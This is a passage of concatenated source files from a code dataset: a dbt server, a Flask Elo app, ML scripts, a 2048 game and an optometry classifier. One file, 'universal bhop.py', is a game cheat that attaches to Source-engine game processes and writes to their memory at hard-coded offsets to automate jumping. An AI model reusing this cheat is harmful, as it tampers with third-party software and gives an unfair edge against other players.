self.args.open_browser:\n try:\n webbrowser.open_new_tab(f\"http://127.0.0.1:{port}\")\n except webbrowser.Error:\n pass\n\n try:\n httpd.serve_forever() # blocks\n finally:\n httpd.shutdown()\n httpd.server_close()\n\n return None\n","repo_name":"degagawolde/data-warehouse-dbt-airflow-postgress","sub_path":"deng/lib/python3.8/site-packages/dbt/task/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"14922670731","text":"import dearpygui.dearpygui as dpg\nimport pymem, threading, keyboard, time, sys, pyautogui\n\n#Constants\ndoJump = 5\ndontJump = 4\n#End of Constants\n\nkillAllThreads = False\n\n#Declaration\nonGround = hex\ndwForceJump = hex\nprocess = 0\nclientDLL = 0\n\n#Get the correct offset for the correct game\nfor window in pyautogui.getAllWindows():\n if window.title == \"HALF-LIFE: Deathmatch\":\n process = pymem.Pymem(\"hl2.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, \"client.dll\").lpBaseOfDll\n onGround = clientDLL + 0x46AF1C\n dwForceJump = clientDLL + 0x468994\n \n if window.title == \"Counter-Strike Source\":\n process = pymem.Pymem(\"hl2.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, 
\"client.dll\").lpBaseOfDll\n onGround = clientDLL + 0x4F82AC\n dwForceJump = clientDLL + 0x4F5D24\n\n if window.title == \"Team Fortress 2\":\n process = pymem.Pymem(\"hl2.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, \"client.dll\").lpBaseOfDll\n onGround = clientDLL + 0xC93A3C\n dwForceJump = clientDLL + 0xC90840\n\n if window.title == \"Counter-Strike: Global Offensive - Direct3D 9\":\n process = pymem.Pymem(\"csgo.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, \"client.dll\").lpBaseOfDll \n onGround = clientDLL + 0xDF1B54\n dwForceJump = clientDLL + 0x52BBCD8\n \n if window.title == \"Left 4 Dead 2 - Direct3D 9\":\n process = pymem.Pymem(\"left4dead2.exe\")\n clientDLL = pymem.pymem.process.module_from_name(process.process_handle, \"client.dll\").lpBaseOfDll \n onGround = clientDLL + 0x77FBB4\n dwForceJump = clientDLL + 0x757DF0\n\n#if no game is open\nif onGround == hex or dwForceJump == hex or process == 0 or clientDLL == 0:\n sys.exit()\n\n# functions for the key binding\ndef get_bind(elem): # function to get the bind from a button\n button_label = dpg.get_item_label(elem) # getting button label\n return button_label.split(':')[1].strip()\n\ndef set_bind(sender):\n dpg.set_item_indent(\"bhopKey\", 10)\n while True:\n key = keyboard.read_key()\n if key:break # if a key is pressed, break\n dpg.set_item_indent(\"bhopKey\", 0)\n dpg.set_item_label(sender, f'bind: {key}') # setting bind to button\n\n\n#Window & GUI creation\ndpg.create_context()\nwith dpg.window(tag=\"Window\", label=\" \", width=300, height=300, no_collapse=True, no_resize=True):\n\n dpg.add_checkbox(tag=\"bhopCheck\", label=\"Toggle Bhop\", default_value=True)\n dpg.add_button(tag=\"bhopKey\", label=\"bind: space\", callback=set_bind) #Button that acts a key bind\n dpg.add_spacer(height=165)\n\n dpg.add_button(tag=\"destButton\", label=\"destroy gui\")\n\ndpg.create_viewport(title=\"Bhop\", width=300, max_width=300, min_width=300, height=300, max_height=300, min_height=300)\ndpg.setup_dearpygui()\ndpg.show_viewport()\ndpg.set_primary_window(\"Window\", True)\n\n#Bhop function/thread\ndef bhop():\n while True:\n if killAllThreads == True:\n sys.exit()\n\n if process.read_int(onGround) == True:\n if keyboard.is_pressed(get_bind(\"bhopKey\")):\n if dpg.get_value(\"bhopCheck\") == False: # ? I WOULD place the if check outside of these other if statements\n continue # ? BUT the keyboard library is picky about when checking the key\n # ? 
that it causes input lag.\n process.write_int(dwForceJump, doJump)\n else:\n process.write_int(dwForceJump, dontJump)\nbhopThread = threading.Thread(target=bhop, args=())\nbhopThread.start()\n\n#Main rendering loop\nwhile dpg.is_dearpygui_running():\n\n #Close button\n if dpg.get_item_state(\"destButton\")['clicked'] == True:\n killAllThreads = True\n dpg.stop_dearpygui()\n\n dpg.render_dearpygui_frame()\n\n#If they press the X button, then it will hit this and exit.\nkillAllThreads = True\ndpg.destroy_context()","repo_name":"yoshisaac/PyCheats","sub_path":"Source/universal bhop.py","file_name":"universal bhop.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29430854788","text":"__author__ = '212391398'\n\nimport random\nimport compute\nimport os\n\nfrom flask import Flask\nfrom flask import request\n\napp = Flask(__name__)\n\n@app.route('/competitors')\ndef list():\n with open(\"competitors.json\") as fin:\n ret = fin.read()\n return ret\n\n@app.route('/calculate')\ndef calculate():\n c1Str = request.args.get('c1')\n c2Str = request.args.get('c2')\n matchStr = request.args.get('match')\n\n c1 = int(c1Str)\n c2 = int(c2Str)\n match = float(matchStr)\n\n #match = 1\n #c1 = 1583\n #c2 = 1572\n\n results = compute.calculate_elo_rank(c1, c2, match)\n\n ret = \"Current Competitor 1: \" + str(c1) + \"
<br>\"\n    ret += \"Current Competitor 2: \" + str(c2) + \"<br>\"\n    ret += \"Match: \" + str(match) + \"<br>\"\n    ret += \"New Competitor 1 rank: \" + str(results[0]) + \"<br>\"\n    ret += \"New Competitor 2 rank: \" + str(results[1]) + \"<br>
\"\n\n return ret\n\nif __name__ == '__main__':\n app.run()","repo_name":"dattnguyen82/DreamJiuJitsu","sub_path":"dream_rank.py","file_name":"dream_rank.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1956574833","text":"import tensorflow as tf\n\n\nclass Network(object):\n\n def weight_variable(self, shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n def bias_variable(self, shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n def nn_layer(self, input_tensor, input_dim, output_dim, layer_name, act=tf.nn.relu):\n\n with tf.name_scope(layer_name):\n\n with tf.name_scope('weights'):\n weights = self.weight_variable([input_dim, output_dim])\n\n with tf.name_scope('biases'):\n biases = self.bias_variable([output_dim])\n\n with tf.name_scope('Wx_plus_b'):\n preactivate = tf.matmul(input_tensor, weights) + biases\n activations = act(preactivate, name='activation')\n\n return activations\n\n def feed_dict(self, dropout, keep_prob, mnist, train, x, y_):\n\n if train:\n xs, ys = mnist.train.next_batch(100)\n k = dropout\n else:\n xs, ys = mnist.test.images, mnist.test.labels\n k = 1.0\n\n return {x: xs, y_: ys, keep_prob: k}\n","repo_name":"shree6791/Deep-Learning","sub_path":"ANN/src/model/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"331247247","text":"import os\nimport numpy as np\n\nN=1000\nfor i in np.arange(0,151,4):\n for j in range(N):\n try:\n os.remove('lc'+str(i)+'_'+str(j))\n except:\n continue\n","repo_name":"Lace-t/DRW-measurement","sub_path":"kDRW/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5354187404","text":"#!/bin/python3\n\nfrom random import choice\nfrom Tile import *\n\n# store_data = False\nscreen = turtle.Screen()\n\ni = 2\nwhile i < 5000:\n screen.addshape(str(i)+\".gif\")\n i*=2\n\nbox_size = 64\n\ngrid = [[None for x in range(0,4)] for y in range(0,4)]\n\ndef get(x, y):\n if grid[x][y] == None:\n return 0\n return grid[x][y].value\n\ndef score():\n sum = 0\n for x in range(0,4):\n for y in range(0,4):\n sum += get(x,y)\n return sum\n\ndef can_go_down():\n for x in range(0,4):\n for y1 in range(0,4):\n for y2 in range(y1-1,-1,-1):\n if grid[x][y1] != None and grid[x][y2] == None:\n return True\n return vertical_merges()\n\ndef can_go_up():\n for x in range(0,4):\n for y1 in range(3,-1,-1):\n for y2 in range(y1+1,4):\n if grid[x][y1] != None and grid[x][y2] == None:\n return True\n return vertical_merges()\n\ndef can_go_left():\n for y in range(0,4):\n for x1 in range(0,4):\n for x2 in range(x1-1,-1,-1):\n if grid[x1][y] != None and grid[x2][y] == None:\n return True\n return horizontal_merges()\n \ndef can_go_right():\n for y in range(0,4):\n for x1 in range(3,-1,-1):\n for x2 in range(x1+1,4):\n if grid[x1][y] != None and grid[x2][y] == None:\n return True\n return horizontal_merges()\n\n \ndef vertical_merges():\n for x in range(0,4):\n for y in range(1,4):\n if grid[x][y] != None and grid[x][y-1] != None and grid[x][y].value == grid[x][y-1].value:\n return True\n return False\n\ndef horizontal_merges():\n for x in range(1,4):\n for y in range(0,4):\n if grid[x][y] != None and grid[x-1][y] != None and grid[x][y].value == 
grid[x-1][y].value:\n return True\n return False\n\ndef draw_box(x, y):\n turtle.penup()\n turtle.setposition(x*box_size, y*box_size)\n turtle.pendown()\n turtle.setposition((x+1)*box_size, y*box_size)\n turtle.setposition((x+1)*box_size, (y+1)*box_size)\n turtle.setposition(x*box_size, (y+1)*box_size)\n turtle.setposition(x*box_size, y*box_size)\n turtle.penup()\n \ndef add_tile(x, y):\n if grid[x][y] == None:\n # num = choice([2,2,2,2,4,2,2,2,2,2])\n num = 2\n grid[x][y] = Tile(x,y,num)\n return grid[x][y]\n \ndef add_random_tile():\n options = []\n for x in range(0,4):\n for y in range(0,4):\n if grid[x][y] == None:\n options.append((x,y))\n \n x,y = choice(options)\n add_tile(x,y)\n\ndef refresh():\n for x in range(0,4):\n for y in range(0,4):\n if grid[x][y] != None:\n grid[x][y].refresh(x,y)\n \n if not (can_go_down() or can_go_left() or can_go_right() or can_go_up()):\n print(\"Game Over! Score:\", score())\n\n# def store_data():\n# new_line=True\n# f = open(\"dataset.txt\",\"r\")\n# if f==\"\":\n# new_line=False\n# f.close()\n# f = open(\"dataset.txt\",\"a\")\n# if new_line==True:\n# f.write(\"\\n\")\n \ndef down():\n if not can_go_down():\n return\n shift(0,-1)\n merge(0,-1)\n shift(0,-1)\n add_random_tile()\n refresh()\n\ndef up():\n if not can_go_up():\n return\n shift(0,1)\n merge(0,1)\n shift(0,1)\n add_random_tile()\n refresh()\n \ndef right():\n if not can_go_right():\n return\n shift(1,0)\n merge(1,0)\n shift(1,0)\n add_random_tile()\n refresh()\n \ndef left():\n if not can_go_left():\n return\n shift(-1,0)\n merge(-1,0)\n shift(-1,0)\n add_random_tile()\n refresh()\n \ndef shift(i, j):\n if i + j < 0:\n xrange = range(-i,4)\n yrange = range(-j,4)\n else:\n xrange = range(3-i,-1,-1)\n yrange = range(3-j,-1,-1)\n \n for x in xrange:\n for y in yrange:\n x1 = x\n y1 = y\n while 0 <= x1+i <= 3 and 0 <= y1+j <= 3 and grid[x1+i][y1+j] == None:\n grid[x1+i][y1+j] = grid[x1][y1]\n grid[x1][y1] = None\n x1 += i\n y1 += j\n \ndef merge(i, j):\n if i + j < 0:\n xrange = range(-i,4)\n yrange = range(-j,4)\n else:\n xrange = range(3-i,-1,-1)\n yrange = range(3-j,-1,-1)\n \n for x in xrange:\n for y in yrange:\n if grid[x][y] != None and grid[x+i][y+j] != None and grid[x+i][y+j].merge(grid[x][y]):\n grid[x][y].turtle.ht()\n grid[x][y] = None\n \ndef setup():\n screen.onkey(up,\"w\")\n screen.onkey(left,\"a\")\n screen.onkey(down,\"s\")\n screen.onkey(right,\"d\")\n clear_board()\n add_random_tile()\n add_random_tile()\n screen.listen()\n screen.delay(7)\n \n\ndef unsetup():\n screen.onkey(None,\"w\")\n screen.onkey(None,\"a\")\n screen.onkey(None,\"s\")\n screen.onkey(None,\"d\")\n\ndef clear_board():\n for i in range(4):\n for n in range(4):\n if grid[i][n]!=None:\n grid[i][n].turtle.ht()\n grid[i][n] = None\n","repo_name":"Death-by-pip/2048-AI-mediocre","sub_path":"Helpers.py","file_name":"Helpers.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9007406550","text":"import argparse\nimport os\nimport sys\nimport numpy as np\nimport torch\n\nfrom environments.index_environment import Env\nfrom utils.utils import get_device, read_config_file\nfrom utils.utils_graphs import plot_returns, plot_values\n\nfrom agents.particle_filter import ParticleFilter\nfrom agents.actor_critic import ActorCritic\nfrom agents.ppo import PPO\nfrom agents.reinforce import reinforce_agent\n\n\nparser = argparse.ArgumentParser(description='Parser to run best models')\nparser.add_argument('--save_dir', 
type=str, default='./figs/',\n help='location where figures will be saved')\nparser.add_argument('--config_path', type=str, default='./config.json',\n help='location where config file is')\nparser.add_argument('--experience', type=int, default=0,\n help='experience of environment')\nparser.add_argument('--n_tests', type=int, default=100,\n help='number of tests to compute TEs')\nparser.add_argument('--seed', type=int, default=1111,\n help='random seed')\n\nargs = parser.parse_args()\nargsdict = args.__dict__\nargsdict['code_file'] = sys.argv[0]\n\n# Use the flags passed to the script to make the\n# name for the experimental directory\nprint(\"\\n########## Setting Up Experiment{} ##########\".format(args.experience))\nflags = [flag.lstrip('--').replace('/', '').replace('\\\\', '') for flag in sys.argv[1:]]\n\nexperiment_path = os.path.join(args.save_dir+'_'.join([str(argsdict['experience']),\n str(argsdict['seed']), '/']))\n\nprint('Figures will be saved in: {}'.format(experiment_path))\nif not os.path.exists(experiment_path):\n os.mkdir(experiment_path)\n\n# Increment a counter so that previous results with the same args will not\n# be overwritten. Comment out the next four lines if you only want to keep\n# the most recent results.\ni = 0\nwhile os.path.exists(experiment_path + \"_\" + str(i)):\n i += 1\nexperiment_path = experiment_path + \"_\" + str(i)\n\n# Set experiment\nconfig = read_config_file(args.config_path)\nenv = Env(data_path='./data/returns.csv', context='test', experiment=args.experience)\ndevice = get_device()\n\n# set seed for entire run and instanciate models\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\n\n# Particle filter\nparams_pf = config[\"PF\"]\nparticle_filter_agent = ParticleFilter(n_particles=params_pf[\"n_particles\"], n_assets=env.n_assets,\n vol=params_pf[\"vol\"], likeli_scale=params_pf[\"likeli_scale\"])\n\n# A2C\nparams_ac = config[\"A2C\"]\nagent_ac = ActorCritic(params_ac[\"n_episodes\"], params_ac[\"gamma\"], params_ac[\"lr_valf\"],\n params_ac[\"lr_pol\"], params_ac[\"n_hidden_valf\"], params_ac[\"n_hidden_pol\"])\n\n# PPO\nparams_ppo = config[\"PPO\"]\nagent_ppo = PPO(env.n_states, env.n_assets, params_ppo[\"hyperparams\"]).float().to(device)\n\n# REINFORCE\nparams_re = config['RE']\nagent_reinforce = reinforce_agent(params_re['hyperparams'], env)\n\n\n# main loop for figures\nn_figs = 3\n\nfor start in range(n_figs):\n\n # use same start/period\n start = int(np.random.uniform(0, env.history_len-env.T))\n\n # compute predictions\n _, _, returns_pf, values_pf = particle_filter_agent.learn(env, start)\n _, returns_ac, values_ac = \\\n agent_ac.predict(env, start, pred_id='_ac' + str(start), model_path=params_ac[\"best_model_path\"])\n _, returns_ppo, values_ppo = \\\n agent_ppo.predict(env, start, pred_id='_ppo' + str(start), model_path=params_ppo[\"best_model_path\"])\n _, returns_re, values_re = \\\n agent_reinforce.predict(env, start, pred_id='_re' + str(start), model_path=params_re[\"best_model_path\"])\n\n # plot graphs\n returns_path = experiment_path + '_returns_all_' + str(start) + '.png'\n values_path = experiment_path + '_values_all_' + str(start) + '.png'\n\n plot_returns(env, returns_pf, returns_ac, returns_ppo, returns_re, returns_path)\n plot_values(env, values_pf, values_ac, values_ppo, values_re, values_path)\n\nprint('Done plotting figures!')\n\n# main loop to compute average TE's\n\nTE_PF = []\nTE_PPO = []\nTE_AC = []\nTE_RE = []\n\nfor i in range(args.n_tests):\n\n start = int(np.random.uniform(0, 
env.history_len-env.T))\n\n # compute predictions\n te_pf, _, _, _ = particle_filter_agent.learn(env, start)\n te_ac, _, _ = \\\n agent_ac.predict(env, start, pred_id='_ac' + str(start), model_path=params_ac[\"best_model_path\"])\n te_ppo, _, _ = \\\n agent_ppo.predict(env, start, pred_id='_ac' + str(start), model_path=params_ppo[\"best_model_path\"])\n te_re, _, _ = \\\n agent_reinforce.predict(env, start, pred_id='_ac' + str(start), model_path=params_re[\"best_model_path\"])\n\n # append values\n TE_PF.append(te_pf)\n TE_AC.append(te_ac)\n TE_PPO.append(te_ppo)\n TE_RE.append(te_re)\n\n\nprint('mean Tracking Error for PF: ', round(np.array(TE_PF).mean()*100000, 4))\nprint('mean Tracking Error for A2C: ', round(np.array(TE_AC).mean()*100000, 4))\nprint('mean Tracking Error for PPO: ', round(np.array(TE_PPO).mean()*100000, 4))\nprint('mean Tracking Error for REINFORCE: ', round(np.array(TE_RE).mean()*100000, 4))\n\n","repo_name":"memalette/IndexReplicator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"34978299298","text":"from django.contrib import admin\r\nfrom django.urls import include, path\r\nfrom . import views\r\nfrom .views import LoginView, LogoutView\r\n\r\n\r\n# defining my url patterns here\r\nurlpatterns = [\r\n path('admin/', admin.site.urls),\r\n\r\n path('api/v1/web_app/auth/login/', LoginView.as_view()),\r\n path('api/v1/web_app/auth/logout/', LogoutView.as_view()),\r\n\r\n path('api/v1/web_app/users/', views.ListUsers.as_view()),\r\n path('api/v1/web_app/users//', views.DetailUsers.as_view()),\r\n\r\n path('api/v1/get_all_stations/', views.get_all_stations),\r\n path('api/v1/get_stations_near_to_me/', views.get_nearer_stations),\r\n path('api/v1/get_stations_near_to_a_location/', views.get_stations_near_to_a_location),\r\n\r\n]\r\n","repo_name":"rfdmeshkath/web_map","sub_path":"wmap_back_end/web_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35362813277","text":"from __future__ import division\nimport os\nimport numpy as np\n#from scipy.ndimage import imread\nfrom imageio import imread\n\nimport torch\nimport torch.utils.data as data\n\nfrom datasets import pms_transforms\nfrom . 
import util\nnp.random.seed(0)\n\nclass UPS_Synth_Dataset(data.Dataset):\n def __init__(self, args, root, split='train'):\n self.root = os.path.join(root)\n self.split = split\n self.args = args\n self.shape_list = util.readList(os.path.join(self.root, split + args.l_suffix))\n\n def _getInputPath(self, index):\n shape, mtrl = self.shape_list[index].split('/')\n normal_path = os.path.join(self.root, 'Images', shape, shape + '_normal.png')\n img_dir = os.path.join(self.root, 'Images', self.shape_list[index])\n img_list = util.readList(os.path.join(img_dir, '%s_%s.txt' % (shape, mtrl)))\n\n data = np.genfromtxt(img_list, dtype='str', delimiter=' ')\n select_idx = np.random.permutation(data.shape[0])[:self.args.in_img_num]\n idxs = ['%03d' % (idx) for idx in select_idx]\n data = data[select_idx, :]\n imgs = [os.path.join(img_dir, img) for img in data[:, 0]]\n dirs = data[:, 1:4].astype(np.float32)\n return normal_path, imgs, dirs\n\n def __getitem__(self, index):\n normal_path, img_list, dirs = self._getInputPath(index)\n normal = imread(normal_path).astype(np.float32) / 255.0 * 2 - 1\n imgs = []\n for i in img_list:\n img = imread(i).astype(np.float32) / 255.0\n imgs.append(img)\n img = np.concatenate(imgs, 2)\n\n h, w, c = img.shape\n crop_h, crop_w = self.args.crop_h, self.args.crop_w\n if self.args.rescale and not (crop_h == h):\n sc_h = np.random.randint(crop_h, h) if self.args.rand_sc else self.args.scale_h\n sc_w = np.random.randint(crop_w, w) if self.args.rand_sc else self.args.scale_w\n img, normal = pms_transforms.rescale(img, normal, [sc_h, sc_w])\n\n if self.args.crop:\n img, normal = pms_transforms.randomCrop(img, normal, [crop_h, crop_w])\n\n if self.args.color_aug:\n img = img * np.random.uniform(1, self.args.color_ratio)\n\n if self.args.int_aug:\n ints = pms_transforms.getIntensity(len(imgs))\n img = np.dot(img, np.diag(ints.reshape(-1)))\n else:\n ints = np.ones(c)\n\n if self.args.noise_aug:\n img = pms_transforms.randomNoiseAug(img, self.args.noise)\n\n mask = pms_transforms.normalToMask(normal)\n normal = normal * mask.repeat(3, 2) \n norm = np.sqrt((normal * normal).sum(2, keepdims=True))\n normal = normal / (norm + 1e-10) # Rescale normal to unit length\n\n item = {'normal': normal, 'img': img, 'mask': mask}\n for k in item.keys(): \n item[k] = pms_transforms.arrayToTensor(item[k])\n\n item['dirs'] = torch.from_numpy(dirs).view(-1, 1, 1).float()\n item['ints'] = torch.from_numpy(ints).view(-1, 1, 1).float()\n return item\n\n def __len__(self):\n return len(self.shape_list)\n","repo_name":"guanyingc/SDPS-Net","sub_path":"datasets/UPS_Synth_Dataset.py","file_name":"UPS_Synth_Dataset.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"3"} +{"seq_id":"23843579525","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n Created on Tue Jan 28 15:12:02 2020\n @description: This class is a framework to run the Random Forest (RF) classifier in the task of classification of\n vx130 measurements. This class is able to form three differnt predictions:\n 1. predict the spherical equivalent delta set: |Delta|<=delta and |Delta|>delta sets, where Delta is a threshold of the spherical equivalent delta.\n 2. predict the delta between the objective and subjective sphere and cylinder, and\n 3. 
directly predict the subjective sphere and cylinder based on objective vx measurements.\n @author: ofir shukron\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.impute import KNNImputer\nfrom sklearn import preprocessing\nimport sklearn.feature_selection\nfrom scipy import stats\nfrom scipy.ndimage import median_filter\nimport itertools\nimport pickle\n# import matplotlib\nfrom autorefeyelib.Refraction import vx120Transformer\nfrom autorefeyelib.Refraction import vx120Imputer\n\nclass Classifier:\n \"\"\"\n A framework for the classification of VX -EMR combined data\n into a set with |Delta|<=delta using several test classifiers\n where Delta is either the spherical equivalent, sphere or cylinder\n delta between objective and subjective refraction\n \"\"\"\n def __init__(self):\n print(\"INITIALIZING\")\n self.data = pd.DataFrame()\n self.Left = pd.DataFrame()\n self.Right = pd.DataFrame()\n self.dataParsed = False\n self.dataLoaded = False\n self.sphModel = None # sphere clasifier\n self.cylModel = None # cylinder classifier\n self.vertexDistance = -0.012\n self.transformer = vx120Transformer.Transformer()\n # features below are for either left or right eye, where an underscore _Left, or _Right, appears in the data set.\n # some featues are computed directly from the parser vxParser.\n # All featues are from the VX120/130. The subjective refraction is from the EMR.\n # featureList is a dictionary with keys as feature names and values as their ranges\n # TODO: move features and ranges to xml or json file\n self.featureList = {\n 'Age':[15,100],\n 'Gender':[],\n 'Topo_Sim_K_K1':[], # K1\n 'Topo_Sim_K_K2':[], # K2\n 'WF_SPHERE_R_3':[-5,6], # sphere\n 'WF_CYLINDER_R_3':[-6,0], # cylinder\n 'WF_AXIS_R_3':[], # Axis (radians)\n 'WF_RT_Fv_Zernike_Photo_di_Z_2_-2':[-1,1], # astigmatism\n 'WF_RT_Fv_Zernike_Photo_di_Z_4_0':[-0.2,0.2], # spherical aberration\n 'WF_RT_Fv_Zernike_Photo_di_Z_3_1':[-0.3,0.3], # primary coma photo\n 'WF_RT_Fv_Meso_PupilRadius':[], # pupil radius\n 'WF_RT_Fv_Zernike_Meso_di_Z_2_-2':[-2,2], # astigmatism\n 'WF_RT_Fv_Zernike_Meso_di_Z_4_0':[-0.3, 0.3], # spherical abberation diopter\n 'WF_RT_Fv_Zernike_Meso_di_Z_3_1':[-0.4,0.4], # primary coma meso\n 'Pachy_MEASURE_Acd':[1,5], # anterior chamber depth\n 'Pachy_MEASURE_WhiteToWhite':[8,16], # white to white\n 'Pachy_MEASURE_KappaAngle':[0,25], # kappa angle\n 'Pachy_MEASURE_Thickness':[400,600], # pachimetry\n 'Tono_MEASURE_Average':[], # tonometry\n 'Topo_KERATOCONUS_Kpi':[], # keratoconus index\n 'AnteriorChamberVol':[], # computed\n 'AcdToPupilRadius_Ratio':[], # computed\n 'PupilRadiusToW2W_Ratio':[], # computed\n 'Topo_GENERAL_Geo_Q':[],\n 'kRatio':[], # computed\n 'J0_3':[], # computed\n 'J45_3':[], # computed\n 'BlurStrength_3':[]} # computed\n\n # self.featureList = np.asanyarray(self.featureList)\n\n def Load(self,fileName):\n \"\"\"\n Load a joint VX-EMR database\n\n Parameters:\n -----------\n fileName: str\n a full path to a csv EMR-VX120 joint database\n \"\"\"\n if not fileName.__class__==str:\n raise ValueError('fileName must be a string. 
Got {fileName.__class__}')\n\n with open(fileName) as csvFile:\n self.data = pd.read_csv(csvFile,low_memory=False)\n self.dataLoaded = True\n self.dataParsed = False\n\n self.Left = pd.DataFrame()\n self.Right = pd.DataFrame()\n self.Both = pd.DataFrame()\n\n def GetCumulativeDelta(self,target='se',bins=np.arange(0,2,0.25)):\n \"\"\"\n Compute the cumulative proportion of the delta being lower than d, where d\n an increasing value in jumps of 0.25 diopters\n\n Parameters:\n ------------\n target : {'se,'sphere','cylinder','glassesSphere','glassesCylinder'}, default='se'\n 'se'- for the spherical equivalent delta\n 'cylinderDelta' - for the cylinder delta\n 'sphereDelta' - for the spherical equivalent delta\n 'glassesSphere' - for the current glasses sphere delta\n 'glassesCylinder' - for the current glasses cylinder delta\n\n Output:\n --------\n res - a table of cumulative percentages from the current data and current target below delta, as defined by the bins\n for left right and both eyes\n \"\"\"\n if np.isin(target.lower(),['se','sphericalequivalent']):\n t = 'SphericalEqDelta'\n elif target.lower() =='cylinder':\n t = 'CylinderDelta'\n elif target.lower()=='sphere':\n t = 'SphereDelta'\n elif target.lower()=='glassessphere':\n t = 'GlassesSphereDelta'\n elif target.lower()=='glassescylinder':\n t = 'GlassesCylinderDelta'\n else:\n raise Exception('option {} is not supported'.format(target))\n res = pd.DataFrame()\n lInds = np.where(pd.isnull(self.Left[t])==False)[0]\n rInds = np.where(pd.isnull(self.Right[t])==False)[0]\n bInds = np.where(pd.isnull(self.Both[t])==False)[0]\n for sIdx in range(len(bins)):\n res.loc[sIdx,target+'_delta'] = bins[sIdx]\n res.loc[sIdx,'Left'] = len(np.where(np.abs(self.Left.loc[self.Left.index[lInds],t])<=bins[sIdx])[0])/len(lInds)\n res.loc[sIdx,'Right'] = len(np.where(np.abs(self.Right.loc[self.Right.index[rInds],t])<=bins[sIdx])[0])/len(rInds)\n res.loc[sIdx,'Both'] = len(np.where(np.abs(self.Both.loc[self.Both.index[bInds],t])<=bins[sIdx])[0])/len(self.Both)\n return res\n\n def GetTrainingAndValidationIndices(self,labels,trainProp=0.8,equalizeTrainingClasses=False):\n \"\"\"\n Assign indices randomly into training and testing data\n return nonoverlapping training, testing fully covering numCases: len(training)+len(testing) = numCases\n Parameters:\n -------------\n labels - vector\n a binary label vectors with one label per observation\n trainProp, float, defaul=0.8\n proportion of observations assigned for training out of the total. 
the reminder is labeled for testing\n equalizeTrainingClasses : bool, default=False\n make equal the proportion of each class in the training set\n Output:\n -------\n training : vector\n indices of training set\n testing : vector\n indices of testing set\n \"\"\"\n numCases = len(labels)\n assert((trainProp<1.0)&(trainProp>0.0))\n numTraining = np.round(trainProp*numCases).astype(np.int)\n rp = np.random.permutation(numCases)\n training = rp[:numTraining]\n testing = rp[numTraining:]\n\n if equalizeTrainingClasses:\n # indices for each class\n n0 = training[np.where(labels[training]==0)[0]]\n n1 = training[np.where(labels[training]==1)[0]]\n if len(n0)>=len(n1):\n n0 = n0[:len(n1)] # truncate no to match length of n1\n else:\n n1 = n1[:len(n0)] # truncate n1 to match length of n0\n training = np.append(n0,n1)\n\n return training, testing\n\n def Parse(self,handleMissing='impute',imputeMethod='univariate',nNeighbors=2,weights='distance',vertexDistance=0.012):\n \"\"\"\n Parse a merged (joint) db of the vx120 and its matched EMR entries\n\n\n Parameters:\n -----------\n handleMissing: {'discard','impute'}, str, default='impute\n either discard rows with missing data or impute, fill in missing with mean columnd values\n univariate: {True, False}, bool, default=True\n for handleMissing='impute', either univariate imputation based on column values\n or multivariate, based on the whole feature matrix\n \"\"\"\n if not self.dataParsed:\n\n # impute missing values using the median\n self.data = self.data.fillna(self.data.median(axis=0))\n print('[Classifier] imputing missing values')\n\n self.data = self.transformer.Transform(self.data)\n print('[Classifier] Transforming data')\n\n # computing additional features\n for eIdx in ['_Left','_Right']:\n # ACD to pupil radius\n self.data[f'AcdToPupilRadius_Ratio{eIdx}'] = 0.5*self.data[f'Pachy_MEASURE_Acd{eIdx}']\\\n /self.data[f'WF_RT_Fv_Meso_PupilRadius{eIdx}']\n # pupil radius to wtw ratio\n self.data[f'PupilRadiusToW2W_Ratio{eIdx}'] = 2*self.data[f'WF_RT_Fv_Meso_PupilRadius{eIdx}']\\\n /self.data[f'Pachy_MEASURE_WhiteToWhite{eIdx}']\n self.data[f'kRatio{eIdx}'] = self.data[f'Topo_Sim_K_K1{eIdx}']/self.data[f'Topo_Sim_K_K2{eIdx}']\n\n # divide the data to Left and Right according to the featureList\n for fIdx in self.featureList.keys():\n if fIdx+'_Left' in self.data.keys():\n self.Left.loc[:,fIdx] = self.data[fIdx+'_Left']\n if fIdx+'_Right' in self.data.keys():\n self.Right.loc[:,fIdx] = self.data[fIdx+'_Right']\n if fIdx in self.data.keys():\n self.Left.loc[:,fIdx] = self.data[fIdx]\n self.Right.loc[:,fIdx] = self.data[fIdx]\n print('[Classifier] dividing data to Left and Right eye')\n\n # Add subjective values to Left and Right databases\n self.Left['EMR:VisualAcuitySphere'] = self.data['EMR:VisualAcuitySphere_Left'].apply(self.transformer.Round)\n 